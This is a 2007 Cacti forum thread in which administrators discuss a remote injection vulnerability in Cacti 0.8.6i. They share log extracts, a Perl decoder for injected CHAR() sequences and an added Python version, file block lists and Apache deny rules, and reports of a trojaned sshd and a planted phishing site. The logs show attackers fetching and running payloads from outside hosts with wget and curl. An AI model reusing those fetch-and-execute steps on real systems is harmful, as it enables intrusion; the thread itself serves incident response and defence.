Cacti: official forums and support

[Cacti <= 0.8.6i] Remote Injection Exploit
Help: General
dvl
Joined: 15 Nov 2006
Posts: 16
Location: Warrington, PA

Posted: Sat Jan 13, 2007 2:32 pm    Post subject: I think not...

lozzd: I suspect you're fine.

Compare your results with mine: http://www.freebsddiary.org/cacti-exploit.php

lozzd
Joined: 08 Dec 2005
Posts: 30

Posted: Sat Jan 13, 2007 7:13 pm

Great, thanks dvl.
I guess it must have failed, as I saw nothing at all unusual in my graphs. I just happened to be nosing through my error logs and found it. I'm quite impressed really that my Apache seems to be so locked down; I thought I'd done a poor attempt at securing it, but I'd obviously done something right, as everything was blocked!

scratchspace
Joined: 14 Jan 2007
Posts: 1

Posted: Sun Jan 14, 2007 5:36 pm

Since we'd all like to know what it is these guys did to machines that were compromised, I wrote a script to decode the commands sent to the server. Fortunately, it appears these guys aren't taking all the steps to cover their tracks. One individual was clever enough to email himself. Enjoy.

Chris

Code:

#!/usr/bin/perl
use strict;
use warnings;

# Point to the log file (Apache common/combined log format)
my $logfile = "/var/log/httpd/access_log";
open(my $fh, '<', $logfile) or die "Cannot open $logfile: $!";

while (my $line = <$fh>) {
   chomp $line;
   # Only look at requests for /cacti
   next unless $line =~ /cacti/;

   # Split the log line on spaces. $fields[6] is the request path
   # (host ident user [date tz] "METHOD path proto" status bytes).
   my @fields  = split / /, $line;
   my $request = $fields[6];
   next unless defined $request;

   # Chopping these up is kinda ugly: the injected SQL spells out
   # strings as CHAR(n,n,...), so split on commas and walk the pieces.
   my $decode = 0;
   foreach my $item (split /,/, $request) {
      # Look for CHAR(, grab the first decimal number, start decoding.
      if ($item =~ /CHAR\((\d+)/) {
         print chr($1);
         $decode = 1;
         next;
      }
      # Look for the closing paren, grab the last decimal number, stop decoding.
      if ($decode && $item =~ /^(\d+)\)/) {
         print chr($1), "\n";
         $decode = 0;
         next;
      }
      # Decode the middle decimal numbers
      if ($decode && $item =~ /^(\d+)$/) {
         print chr($1);
      }
   }
}
close $fh;
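Added example (my own, not Chris's script): the same CHAR() decoding idea in Python, run over constructed Apache log lines; it also URL-decodes the request and handles several CHAR() groups per request. The `x=` query parameter and the 192.0.2.x addresses are made up for illustration and do not reproduce the real exploit request.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: host ident user [date tz] "METHOD path proto" status ...
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# MySQL CHAR(n, n, ...) with decimal codes, as used to spell out strings in the injection
CHAR_RE = re.compile(r'CHAR\(\s*([\d\s,]+?)\s*\)', re.IGNORECASE)


def decode_char_groups(request_path):
    """Return the strings spelled by every CHAR(...) group in one request path."""
    decoded = []
    text = unquote(request_path)  # CHAR%28...%29 in the log becomes CHAR(...)
    for group in CHAR_RE.findall(text):
        codes = [int(c) for c in group.split(',') if c.strip()]
        # keep printable ASCII, show anything else as an escaped byte
        decoded.append(''.join(chr(c) if 32 <= c < 127 else '\\x%02x' % (c & 0xff)
                               for c in codes))
    return decoded


def scan_log(lines, path_filter='cacti'):
    """Return (host, time, status, decoded) for each matching request that carries CHAR()."""
    findings = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m or path_filter not in m['path']:
            continue
        groups = decode_char_groups(m['path'])
        if groups:
            findings.append((m['host'], m['time'], int(m['status']), groups))
    return findings


# Constructed sample lines (RFC 5737 addresses, made-up query parameter), not a real capture.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cacti/graph_view.php HTTP/1.1" 200 5120',
    '192.0.2.77 - - [29/Jan/2007:15:22:01 +0000] "GET /cacti/cmd.php?x=CHAR(116,101,115,116) HTTP/1.1" 200 92',
    '192.0.2.77 - - [29/Jan/2007:15:22:09 +0000] "GET /cacti/cmd.php?x=CHAR%28104%2C105%29 HTTP/1.1" 200 92',
]

if __name__ == '__main__':
    for host, when, status, decoded in scan_log(SAMPLE_LOG):
        print(f'{host} {when} status={status} decoded={decoded!r}')
```

Point `scan_log` at the lines of your own access_log to see which source hosts sent CHAR() sequences and what they spell.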

dagonet
Cacti User
Joined: 29 Oct 2005
Posts: 76
Location: Wuerzburg

Posted: Mon Jan 15, 2007 5:36 am

Hello Community,

We should also consider the use of modsecurity (http://www.modsecurity.org) for Apache installations.
I installed this module, so now a request to, for example, cmd.php gets a 403 response code.

For IIS installations it is quite easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet

raX
Lead Developer
Joined: 13 Oct 2001
Posts: 2237
Location: Carlisle, PA

Posted: Wed Jan 17, 2007 10:37 pm

In addition to the official patches for this vulnerability, Cacti version 0.8.6j has just been released.

http://www.cacti.net/release_notes_0_8_6j.php

Be sure to upgrade ASAP!

-Ian

Mehuge
Joined: 23 Feb 2006
Posts: 4

Posted: Fri Feb 02, 2007 2:25 pm

Humm...

I just did yum update and got 0.8.6i, then noticed in this post that 0.8.6j was out, so I downloaded and updated using rpm -U cacti-0.8.6j.fc4.i386.rpm

It made me go through the install process again; it remembered all my graphs and data sources etc., but has lost all historical data.

Is this normal? Is it possible to recover this data? Is it because I upgraded two versions without going through the install process in between?

I upgraded (and am in this thread) because my server was compromised via this exploit. Extracts from my logs of the various hack attempts, for your reference:

access_log wrote:
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 303
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cmd.php HTTP/1.1" 404 285
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /cacti/cmd.php HTTP/1.1" 200 92
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cacti/cmd.php HTTP/1.1" 404 298
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /portal/cmd.php HTTP/1.1" 404 292
80.48.30.10 - - [29/Jan/2007:15:20:43 +0000] "GET /stats/cmd.php HTTP/1.1" 404 291


error_log wrote:
[client 80.48.30.10] PHP Notice: Undefined index: 1 in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: total_polls in /var/lib/cacti/lib/functions.php on line 511
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 512
[client 80.48.30.10] PHP Notice: Undefined index: snmp_community in /var/lib/cacti/lib/functions.php on line 523
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 536
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 540
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 544
[client 80.48.30.10] PHP Notice: Undefined index: avg_time in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 545
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status in /var/lib/cacti/lib/functions.php on line 548
[client 80.48.30.10] PHP Notice: Undefined index: status_fail_date in /var/lib/cacti/lib/functions.php on line 624
[client 80.48.30.10] PHP Notice: Undefined index: status_rec_date in /var/lib/cacti/lib/functions.php on line 625
[client 80.48.30.10] PHP Notice: Undefined index: status_last_error in /var/lib/cacti/lib/functions.php on line 626
[client 80.48.30.10] PHP Notice: Undefined index: min_time in /var/lib/cacti/lib/functions.php on line 627
[client 80.48.30.10] PHP Notice: Undefined index: max_time in /var/lib/cacti/lib/functions.php on line 628
[client 80.48.30.10] PHP Notice: Undefined index: failed_polls in /var/lib/cacti/lib/functions.php on line 632
[client 80.48.30.10] PHP Notice: Undefined index: hostname in /var/lib/cacti/lib/functions.php on line 634
--15:22:38-- http://881107.com/ping.txt
=> `ping.txt'
Resolving 881107.com... 221.251.37.64
Connecting to 881107.com|221.251.37.64|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory


Another, more determined attempt was made today using the same exploit, but it failed again.

gandalf
Developer
Joined: 02 Dec 2004
Posts: 17009
Location: Muenster, Germany

Posted: Fri Feb 02, 2007 5:26 pm

When upgrading, make sure to apply the latest patches from the main Cacti site.
Reinhard

wolf905
Joined: 03 Feb 2007
Posts: 1

Posted: Sun Feb 04, 2007 12:05 am    Post subject: Exploits in the Wild

All,

Please excuse me if this is all old news.

I have had cacti lurking in the background on my web server for some time. Being that the machine is a personal web/e-mail server, it doesn't get a lot of attention.

This morning, I discovered my inbox full of errors from the cron daemon. It appears someone was using the cacti exploit to gain access to my system.

This was a non-trivial attack. Even though apache ran in its own userid, the attacker used a kernel exploit (I was running an older linux kernel version, 2.6.17) to gain root access. The attacker successfully replaced my sshd with a trojan, which copied login/passwords to a file in /usr/include/gpm3.h. Also, there was no trace of the commands he ran through the web server. All that I had in the logs were a whole lot of "Connection Refused" errors, and this:

Code:
--22:09:42--  http://207.58.141.211/~gr/ping
           => `ping'
Connecting to 207.58.141.211:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 629 [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
mv: cannot stat `ping': No such file or directory
Can't open perl script "temp2006": No such file or directory
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   629  100   629    0     0   6685      0 --:--:-- --:--:-- --:--:--  6685
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   629  100   629    0     0   6701      0 --:--:-- --:--:-- --:--:--  6701
100   629  100   629    0     0   6688      0 --:--:-- --:--:-- --:--:--     0
Error: Connection refused


What the attacker failed to do was log into my system. The sshd they installed broke my sshd configuration (I have a slightly unusual setup), and they were thereafter unable to log in. He did a decent job of covering his tracks, and deleted my cacti.log, but left enough of a trail for me to identify what he was doing. Regardless, this idiot caused my system to reload, broke in far enough to warrant re-imaging (upgrading to FC6), and ticked me off.

A previous attacker attempted to gain access to my system on the 25th of Jan, but was unable to break out of the apache user account. This attacker's attempts were fairly well documented in the log files as a series of attempts to use the basic milw0rm.com exploit.

Just thought I'd document my findings, and let people know that this is being actively exploited in the wild. If you have any system holes (like my kernel privilege escalation vulnerability), this cacti vulnerability could be big trouble.

Good luck,
WLF

kaptk2
Joined: 16 Feb 2005
Posts: 14
Location: Western United States

Posted: Sun Feb 11, 2007 2:01 am

What is the best way to recover from this attack? Can anybody offer hints on what to do to clean up a compromised system?

rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA

Posted: Sun Feb 11, 2007 12:21 pm

If you even suspect a compromise, I would suggest a system reload.

You can back up and restore your Cacti installation, not the whole server.

shahzadmasih
Joined: 28 Feb 2007
Posts: 1
Location: UK

Posted: Wed Feb 28, 2007 9:24 am

Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards,

rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA

Posted: Wed Feb 28, 2007 9:46 am

shahzadmasih wrote:
Hi, This post is very informative, however I would like some specific information. If someone can help me then please send me a private message. Best Regards,


What would you like more information on?

JJX
Cacti User
Joined: 06 Oct 2005
Posts: 196

Posted: Wed Apr 04, 2007 1:05 pm

dagonet wrote:
Hello Community,

We should also consider the use of modsecurity (http://www.modsecurity.org) for Apache installations.
I installed this module, so now a request to, for example, cmd.php gets a 403 response code.

For IIS installations it is quite easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet


Is it possible to share with us the mod_security configuration that affects Cacti?

mooreds
Joined: 06 Apr 2007
Posts: 1
Location: Boulder, CO

Posted: Fri Apr 06, 2007 12:53 pm

dagonet wrote:
Hello Community,

We should also consider the use of modsecurity (http://www.modsecurity.org) for Apache installations.
I installed this module, so now a request to, for example, cmd.php gets a 403 response code.

For IIS installations it is quite easy to put a redirect on particular files:
cacti/cmd.php
cacti/copy_cacti_user.php
cacti/poller.php
cacti/poller_commands.php
cacti/poller_export.php
cacti/poller_reindex_hosts.php
cacti/rebuild_poller_cache.php
cacti/script_server.php
cacti/scripts
cacti/include
cacti/install

You can do it from the management console of the IIS.

Dagonet


You can block access to cacti files and directories with Apache as well, and I don't know if you need mod_security. Inside your virtual server or document root, put entries like this:
Code:

    <Files cmd.php>
            Order allow,deny
            Deny from all
    </Files>

    <Directory /usr/local/cacti-0.8.6j/log>
            Order allow,deny
            Deny from all
    </Directory>


See http://httpd.apache.org/docs/1.3/mod/core.html#directory and http://httpd.apache.org/docs/1.3/mod/core.html#files for more.

JustJoe
Joined: 24 Mar 2005
Posts: 10

Posted: Sun Jun 10, 2007 3:51 pm

Of course this vulnerability is solved now, but I just wanted to let people know it's ABSOLUTELY VITAL to UPDATE. I just found out the hard way: I was hacked. Big time. They managed to put a PayPal phishing site on my home webby using this vulnerability.

A few days ago I got a call from my ISP informing me they had shut down my internet connection because they received notice from Verisign that a fraudulent website was active on my IP. I fell out of my chair. Seriously.
Going through Apache logs I found when they hacked in. Only 15 hours after they got in the phishing started. The log shows countless GETs on URLs like
Code:
 /cacti/rra/www.paypal.fr/cgi-bin/webscr/SignIn&co_partnerId=2&pUserId=&siteid=0&pageType=&pa1/Update-profile-notify/index.html

They must have sent out e-mails to lots of paypal.fr clients persuading them to 'reactivate their account'. I found this picture of what it must've looked like.

The phishing lasted for 4 days. Now my ISP has disconnected me during the investigation. I'm quite confident I'll be proven innocent and get my internet connection back next week. So no real harm done to me, but I don't know how many people fell for this shit and gave the criminals their PayPal login and/or CC credentials....

So, the moral of the story, as said before:

ALWAYS KEEP YOUR SOFTWARE UP-TO-DATE !